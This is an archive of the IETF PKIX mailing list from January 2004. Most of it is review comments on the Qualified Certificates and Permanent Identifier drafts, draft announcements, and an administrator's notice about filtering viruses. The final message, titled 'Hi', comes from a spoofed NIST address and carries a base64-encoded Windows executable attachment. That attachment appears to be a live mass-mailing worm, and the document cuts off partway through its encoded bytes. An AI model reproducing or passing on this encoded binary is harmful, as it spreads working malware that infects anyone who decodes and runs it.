<ietf-pkix@imc.org> Subject: RE: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt Date: Wed, 21 Jan 2004 19:25:16 -0800 Message-ID: <005801c3e097$5c021630$1400a8c0@augustcellars.local> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal In-Reply-To: <200401202044.PAA20813@ietf.org> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Comments on this draft. 1. Section 2, para 2: The text "where the certificate meet some qualification requirements" should be changed to either "certificates meet" or "certificate meets" (grammer) 2. You need to update your example certificate, the DOB is no longer formed correctly. 3. I suggest not including a nameRegistrationAuthority in the example certificate to illistrate how a certificate complient to this document is created. jim > -----Original Message----- > From: owner-ietf-pkix@mail.imc.org > [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of > Internet-Drafts@ietf.org > Sent: Tuesday, January 20, 2004 12:45 PM > To: IETF-Announce: > Cc: ietf-pkix@imc.org > Subject: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt > > > A New Internet-Draft is available from the on-line > Internet-Drafts directories. This draft is a work item of the > Public-Key Infrastructure (X.509) Working Group of the IETF. > > Title : Internet X.509 Public Key > Infrastructure: Qualified Certificates Profile > Author(s) : S. Santesson, M. Nystrom > Filename : draft-ietf-pkix-sonof3039-03.txt > Pages : 35 > Date : 2004-1-20 > > This document forms a certificate profile, based on RFC 3280, for > identity certificates issued to natural persons. > > The profile defines specific conventions for certificates that are > qualified within a defined legal framework, named Qualified > Certificates. The profile does however not define any legal > requirements for such Qualified Certificates. > > The goal of this document is to define a certificate profile that > supports issuance of Qualified Certificates independent of local > legal requirements. The profile is however not limited to > Qualified > Certificates and further profiling may facilitate specific local > needs. > > A URL for this Internet-Draft is: > http://www.ietf.org/internet-drafts/draft-> ietf-pkix-sonof3039-03.txt > > To remove yourself from the IETF Announcement list, send a message to > ietf-announce-request with the word unsubscribe in the body > of the message. > > Internet-Drafts are also available by anonymous FTP. Login > with the username "anonymous" and a password of your e-mail > address. After logging in, type "cd internet-drafts" and then > "get draft-ietf-pkix-sonof3039-03.txt". > > A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-sonof3039-03.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0M2Igib047962; Wed, 21 Jan 2004 18:18:42 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0M2IgJO047961; Wed, 21 Jan 2004 18:18:42 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp2.pacifier.net (smtp2.pacifier.net [64.255.237.172]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0M2Ieib047955 for <ietf-pkix@imc.org>; Wed, 21 Jan 2004 18:18:40 -0800 (PST) (envelope-from jimsch@nwlink.com) Received: from ROMANS (ip237.132.dial-acs01.sea.iinet.com [209.20.132.237]) by smtp2.pacifier.net (Postfix) with ESMTP id E65C16AD35; Wed, 21 Jan 2004 18:18:41 -0800 (PST) Reply-To: <jimsch@exmsft.com> From: "Jim Schaad" <jimsch@nwlink.com> To: "'Denis Pinkas'" <Denis.Pinkas@bull.net>, "'Tom Gindin'" <tgindin@us.ibm.com> Cc: <ietf-pkix@imc.org> Subject: RE: I-D ACTION:draft-ietf-pkix-pi-08.txt Date: Wed, 21 Jan 2004 18:22:38 -0800 Message-ID: <005701c3e08e$9b392fe0$1400a8c0@augustcellars.local> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal In-Reply-To: <200401212127.QAA09536@ietf.org> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Comments on draft -08. 1. Privacy concerns should be additionally outlined and covered in the security considerations section. 2. Section 1, para 9: Text here allows for an AA to have a unique URI name. Has been removed from the syntax. 3. Section 1, para 14: Suggested text "both the same permanent identifier value and the same Authority Identifer Value, then these". (I find the use of identityType to be confusing since I consider this to relate to type choice of IdentifierValue as well.) 4. Section 2: What is the criteria for use of iA5String vs uTF8String? 5. Section 2: When doing comparisons do I need to cross compare these two different value items? 6. Section 2: The statement 'It is an OID.' is redundant and can be removed. 7. Section 3: Contains a paragraph dealing with matching rules. Since this is no longer a field in the structure the paragraph should be re-written to state what the one and only matching rule is. 8. Appendix A.1: New request, please put a reference to the document containing the pkix module into the pkix document (i.e. something like "-- found in [RFC 3280]". This prevents documents from importing modules that are lower in the standards process without having any explicit reference to them. jim > -----Original Message----- > From: owner-ietf-pkix@mail.imc.org > [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of > Internet-Drafts@ietf.org > Sent: Wednesday, January 21, 2004 1:27 PM > To: IETF-Announce: > Cc: ietf-pkix@imc.org > Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt > > > A New Internet-Draft is available from the on-line > Internet-Drafts directories. This draft is a work item of the > Public-Key Infrastructure (X.509) Working Group of the IETF. > > Title : Internet X.509 Public Key > Infrastructure Permanent Identifier > Author(s) : D. Pinkas, T. Gindin > Filename : draft-ietf-pkix-pi-08.txt > Pages : 12 > Date : 2004-1-21 > > This document define a new form of name, called permanent > identifier, that may be included in the subjectAltName extension > of a public key certificate issued to an entity. > The permanent identifier is an optional feature that may be used > by a CA to indicate that the certificate relates to the same > entity even if the name or the affiliation of that entity stored > in the subject or another name form in the subjectAltName extension > has changed. > The subject name, carried in the subject field, is only unique > for each subject entity certified by the one CA as defined by the > issuer name field. Also, the new name form can carry a > name that is unique for each subject entity certified by a CA. > > A URL for this Internet-Draft is: > http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt > > > To remove yourself from the IETF > Announcement list, send a message to > ietf-announce-request with the word unsubscribe in the body > of the message. > > Internet-Drafts are also available by anonymous FTP. Login > with the username "anonymous" and a password of your e-mail > address. After logging in, type "cd internet-drafts" and then > "get draft-ietf-pkix-pi-08.txt". > > A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0LLR2ib035441; Wed, 21 Jan 2004 13:27:02 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0LLR2PM035440; Wed, 21 Jan 2004 13:27:02 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ietf.org (odin.ietf.org [132.151.1.176]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0LLR0ib035434 for <ietf-pkix@imc.org>; Wed, 21 Jan 2004 13:27:01 -0800 (PST) (envelope-from dinaras@cnri.reston.va.us) Received: from CNRI.Reston.VA.US (localhost [127.0.0.1]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA09536; Wed, 21 Jan 2004 16:27:00 -0500 (EST) Message-Id: <200401212127.QAA09536@ietf.org> Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary="NextPart" To: IETF-Announce: ; Cc: ietf-pkix@imc.org From: Internet-Drafts@ietf.org Reply-to: Internet-Drafts@ietf.org Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt Date: Wed, 21 Jan 2004 16:26:57 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : Internet X.509 Public Key Infrastructure Permanent Identifier Author(s) : D. Pinkas, T. Gindin Filename : draft-ietf-pkix-pi-08.txt Pages : 12 Date : 2004-1-21 This document define a new form of name, called permanent identifier, that may be included in the subjectAltName extension of a public key certificate issued to an entity. The permanent identifier is an optional feature that may be used by a CA to indicate that the certificate relates to the same entity even if the name or the affiliation of that entity stored in the subject or another name form in the subjectAltName extension has changed. The subject name, carried in the subject field, is only unique for each subject entity certified by the one CA as defined by the issuer name field. Also, the new name form can carry a name that is unique for each subject entity certified by a CA. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-pi-08.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-pi-08.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv@ietf.org" Content-Type: text/plain Content-ID: <2004-1-21164305.I-D@ietf.org> ENCODING mime FILE /internet-drafts/draft-ietf-pkix-pi-08.txt --OtherAccess Content-Type: Message/External-body; name="draft-ietf-pkix-pi-08.txt"; site="ftp.ietf.org"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <2004-1-21164305.I-D@ietf.org> --OtherAccess-- --NextPart-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0KKiuib085713; Tue, 20 Jan 2004 12:44:56 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0KKiuhk085712; Tue, 20 Jan 2004 12:44:56 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ietf.org (odin.ietf.org [132.151.1.176]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0KKipib085704 for <ietf-pkix@imc.org>; Tue, 20 Jan 2004 12:44:53 -0800 (PST) (envelope-from dinaras@cnri.reston.va.us) Received: from CNRI.Reston.VA.US (localhost [127.0.0.1]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA20813; Tue, 20 Jan 2004 15:44:51 -0500 (EST) Message-Id: <200401202044.PAA20813@ietf.org> Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary="NextPart" To: IETF-Announce: ; Cc: ietf-pkix@imc.org From: Internet-Drafts@ietf.org Reply-to: Internet-Drafts@ietf.org Subject: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt Date: Tue, 20 Jan 2004 15:44:50 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : Internet X.509 Public Key Infrastructure: Qualified Certificates Profile Author(s) : S. Santesson, M. Nystrom Filename : draft-ietf-pkix-sonof3039-03.txt Pages : 35 Date : 2004-1-20 This document forms a certificate profile, based on RFC 3280, for identity certificates issued to natural persons. The profile defines specific conventions for certificates that are qualified within a defined legal framework, named Qualified Certificates. The profile does however not define any legal requirements for such Qualified Certificates. The goal of this document is to define a certificate profile that supports issuance of Qualified Certificates independent of local legal requirements. The profile is however not limited to Qualified Certificates and further profiling may facilitate specific local needs. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-sonof3039-03.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-sonof3039-03.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-sonof3039-03.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv@ietf.org" Content-Type: text/plain Content-ID: <2004-1-20142920.I-D@ietf.org> ENCODING mime FILE /internet-drafts/draft-ietf-pkix-sonof3039-03.txt --OtherAccess Content-Type: Message/External-body; name="draft-ietf-pkix-sonof3039-03.txt"; site="ftp.ietf.org"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <2004-1-20142920.I-D@ietf.org> --OtherAccess-- --NextPart-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0K3GEib057132; Mon, 19 Jan 2004 19:16:14 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0K3GE7G057131; Mon, 19 Jan 2004 19:16:14 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from [63.202.92.157] (adsl-63-202-92-157.dsl.snfc21.pacbell.net [63.202.92.157]) (authenticated bits=0) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0K3GCic057123 for <ietf-pkix@imc.org>; Mon, 19 Jan 2004 19:16:13 -0800 (PST) (envelope-from phoffman@imc.org) Mime-Version: 1.0 X-Sender: phoffman@mail.imc.org Message-Id: <p0602045cbc324d68ce48@[63.202.92.157]> X-Habeas-SWE-1: winter into spring X-Habeas-SWE-2: brightly anticipated X-Habeas-SWE-3: like Habeas SWE (tm) X-Habeas-SWE-4: Copyright 2002 Habeas (tm) X-Habeas-SWE-5: Sender Warranted Email (SWE) (tm). The sender of this X-Habeas-SWE-6: email in exchange for a license for this Habeas X-Habeas-SWE-7: warrant mark warrants that this is a Habeas Compliant X-Habeas-SWE-8: Message (HCM) and not spam. Please report use of this X-Habeas-SWE-9: mark in spam to <http://www.habeas.com/report>. Date: Mon, 19 Jan 2004 19:16:09 -0800 To: ietf-pkix@imc.org From: Paul Hoffman / IMC <phoffman@imc.org> Subject: ADMINISTRIVIA: Hopefully no more Windows viruses Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Greetings again. I have just installed a procmail filter on this list that should prevent Windows viruses from getting to the mailing list. It won't prevent them all, so you need to continue to remember not to execute stuff that you receive from this (or any!) mailing list. --Paul Hoffman, Director --Internet Mail Consortium Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0J7Vwib047594; Sun, 18 Jan 2004 23:31:58 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0J7VwfP047593; Sun, 18 Jan 2004 23:31:58 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from oemcomputer ([61.8.226.28]) by above.proper.com (8.12.10/8.12.8) with SMTP id i0J7Vqic047538 for <ietf-pkix@imc.org>; Sun, 18 Jan 2004 23:31:53 -0800 (PST) (envelope-from wpolk@nist.gov) Date: Mon, 19 Jan 2004 15:14:21 +0800 To: ietf-pkix@imc.org Subject: Hi From: wpolk@nist.gov Message-ID: <lajvtleohkygxeqnvpw@nist.gov> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="--------255038165501247" Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> ----------255038165501247 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Test =) aurmghmuyecieu -- Test, yep. ----------255038165501247 Content-Type: application/x-msdownload; name="yghwker.exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="oib.exe" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g RE9TIG1vZGUuDQ0KJAAAAAAAAADchu8bmOeBSJjngUiY54FImOeBSJvngUgW+JJIxeeBSGTH k0iZ54FIX+GHSJnngUhSaWNomOeBSAAAAAAAAAAAAAAAAAAAAABQRQAATAEEAN9uCkAAAAAA AAAAAOAADwELAQUMACQAAABCAAAAAAAAijEAAAAQAAAAQAAAAABAAAAQAAAAAgAABAAAAAAA AAAEAAAAAAAAAACgAAAABAAAOScBAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAA AAAAADhBAADIAAAAAJAAAKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAOAEAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAGJlYWdsZQAAhiMAAAAQAAAAJAAAAAQAAAAAAAAAAAAAAAAAACAA AGAucmRhdGEAANQHAAAAQAAAAAgAAAAoAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABONQAA AFAAAAAKAAAAMAAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAAoAMAAACQAAAABAAAADoAAAAA AAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 